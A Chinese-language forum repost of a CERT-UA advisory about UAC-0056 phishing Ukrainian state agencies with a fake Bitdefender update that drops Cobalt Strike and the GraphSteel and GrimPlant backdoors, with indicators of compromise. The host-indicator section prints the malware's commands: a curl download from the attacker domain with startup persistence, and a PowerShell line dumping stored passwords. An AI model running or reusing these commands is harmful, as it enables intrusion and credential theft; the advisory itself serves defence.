[分享]乌克兰CERT-UA警报：UAC-0056 攻击组织使用伪造的 “Bitdefender” 文件对乌克兰国家机构发动攻击

发表于: 2022-3-14 19:38 5271

[分享]乌克兰CERT-UA警报：UAC-0056 攻击组织使用伪造的 “Bitdefender” 文件对乌克兰国家机构发动攻击

比特梵德

2022-3-14 19:38

5271

随着俄罗斯和乌克兰之间的冲突加剧，全球网络诈骗用户汇款或通过网络钓鱼电子邮件传播恶意软件的攻击急剧增长。

乌克兰 CERT-UA 计算机应急响应小组于2022年3月12日发布公告，乌克兰国家机构收到了大规模的网络钓鱼邮件攻击，其中包含有关如何提高信息安全水平的说明。

这封信的正文的链接指向 hxxps：//forkscenter [.] Fr /，建议从该网站下载“BitdefenderWindowsUpdatePackage.exe”的“关键更新”文件，大小约为 60 MB。

上述文件将加载引导程序“alt.exe”的执行，该程序将从 Discord 服务下载文件“one.exe”和“dropper.exe”并运行。经研究确定，运行“one.exe”会带来Cobalt Strike Beacon 恶意程序，下载并运行文件“wisw.exe”，而该文件又应从 Discord 下载并执行该文件“ cesdf.exe”（在分析时不可用）。

dropper.exe 文件将加载、base64 解码、保存到磁盘并执行 java-sdk.exe 文件。除了通过 Windows 注册表确保持久性外，还将下载、base64 解码、保存到磁盘并运行另外两个文件：“microsoft-cortana.exe”，归类为 GraphSteel 后门，以及“oracle-java.exe” "，被归类为 GrimPlant 后门。

请注意，EXE 文件（带有 Discord 的引导加载程序）受 Themida 保护程序的保护。

乌克兰 CERT-UA 计算机应急响应小组已将攻击归咎于 UAC-0056 组织。

IOC指标

文件

ca9290709843584aecbd6564fb978bd6 反病毒保护说明.doc （文档）
cf204319f7397a6a31ecf76c9531a549 User guide.doc （诱饵文档）
b8b7a10dcc0dad157191620b5d4e5312 BitdefenderWindowsUpdatePackage.exe
2fdf9f3a25e039a41e743e19550d4040 alt.exe（不和谐下载器）
aa5e8268e741346c76ebfd1f27941a14 one.exe（包含 Cobalt Strike Beacon）
9ad4a2dfd4cb49ef55f2acd320659b83 wisw.exe (Discord 下载器) (2022-03-06 10:36:07)
15c525b74b7251cfa1f7c471975f3f95 dropper.exe（droper下载器）
c8bf238641621212901517570e96fae7 java-sdk.exe (Go 下载器)
4f11abdb96be36e3806bada5b8b2b8f8 oracle-java.exe (GrimPlant)
9ea3aaaeb15a074cd617ee1dfdda2c26 microsoft-cortana.exe (GraphSteel) (2022-03-01 17:23:26)

网络

hxxps: // forkscenter [.] fr / BitdefenderWindowsUpdatePackage.exe
hxxps: // forkscenter [.] fr / Sdghrt_umrj6 / wisw.exe
hxxps: //cdn.discordapp[.]com/attachments/947916997713358890/949948174636830761/one.exe
hxxps: //cdn.discordapp[.]com/attachments/947916997713358890/949948174838165524/dropper.exe
hxxps: //cdn.discordapp[.]com/attachments/947916997713358890/949978571680673802/cesdf.exe
hxxps: // nirsoft [.] me / s / 2MYmbwpSJLZRAtXRgNTAUjJSH6SSoicLPIrQl / field-keywords /
hxxps: // nirsoft [.] me / nEDFzTtoCbUfp9BtSZlaq6ql8v6yYb / avp / amznussraps /
hxxp: // 45 [.] 84.0.116: 443 / i
hxxp: // 45 [.] 84.0.116: 443 / m
hxxp: // 45 [.] 84.0.116: 443 / p
ws: // 45 [.] 84.0.116: 443 / c
forkscenter [.] fr (2022-01-29)
nirsoft[.]me (2022-02-17)
45[.]84.0.116
156 [.] 146.50.5
-hobot- (користувач-агент)

主机

% TMP% \ alt.exe
%PROGRAMDATA%\one.exe
% PROGRAMDATA%\dropper.exe
%USERPROFILE%\.java-sdk\java-sdk.exe
%USERPROFILE%\.Java-sdk\oracle-java.exe
%USERPROFILE%\.Java-sdk\microsoft-cortana.exe
%USERPROFILE%\AppData\Local\Temp\wisw.exe
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitdefenderControl.lnk
 
HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Java-SDK
 
C:\Windows\System32\cmd.exe/C cd%USERPROFILE%\AppData\Local\Temp\&curl -O hxxps://forkscenter[.]Fr/Sdghrt_umrj6/wisw.exe&mklink%USERPROFILE%\AppDatasoft\ Roaming \Windows\Start Menu\Programs\Startup\BitdefenderControl.lnk%USERPROFILE%\AppData\Local\Temp\wisw.exe
C:\Windows\System32\cmd.exe/C cd/&dir/S>%USERPROFILE%\AppData\Local\Temp\Rsjdjfvj.txt&ipconfig/all>%USERPROFILE%\AppData\Local\Temp\Rsjdrnjngfvj.tx
ipconfig/all
cmd /Q /C netsh wlan показати конфігураційний файл
netsh wlan show конфігураційний файл
powershell / Q / C -encodedCommand ==
[void] [Windows.Security.Credentials.PasswordVault, Windows.Security.Credentials, ContentType = WindowsRuntime]; $vault = Новий об'єкт Windows.Security.Credentials.PasswordVault; $vault.RetrieveAll() | %{$_.RetrievePassword ();$_}| Виберіть Ім'я користувача, Ресурс, Пароль| Формат таблиці-Сховати заголовки таблиць

附加信息

GraphSteel 是使用 GoLang 编程语言开发的恶意程序。定义有关计算机的基本信息（主机名、用户名、IP 地址）、身份验证数据的盗窃、命令的执行、上传文件。WebSocket 和 GraphQL 用于与管理服务器通信；信息流使用 AES 和加密的 base64 进行加密。

GrimPlant 是使用 GoLang 编程语言开发的恶意程序。定义有关计算机的基本信息（IP 地址、主机名、操作系统、用户名、HomeDir），并执行从管理服务器接收到的命令，并发送它们的执行结果。GRPC（Protocol Buffers + HTTP / 2 + SSL）用作协议。管理服务器的地址作为参数传递到命令行。

网络钓鱼邮件截图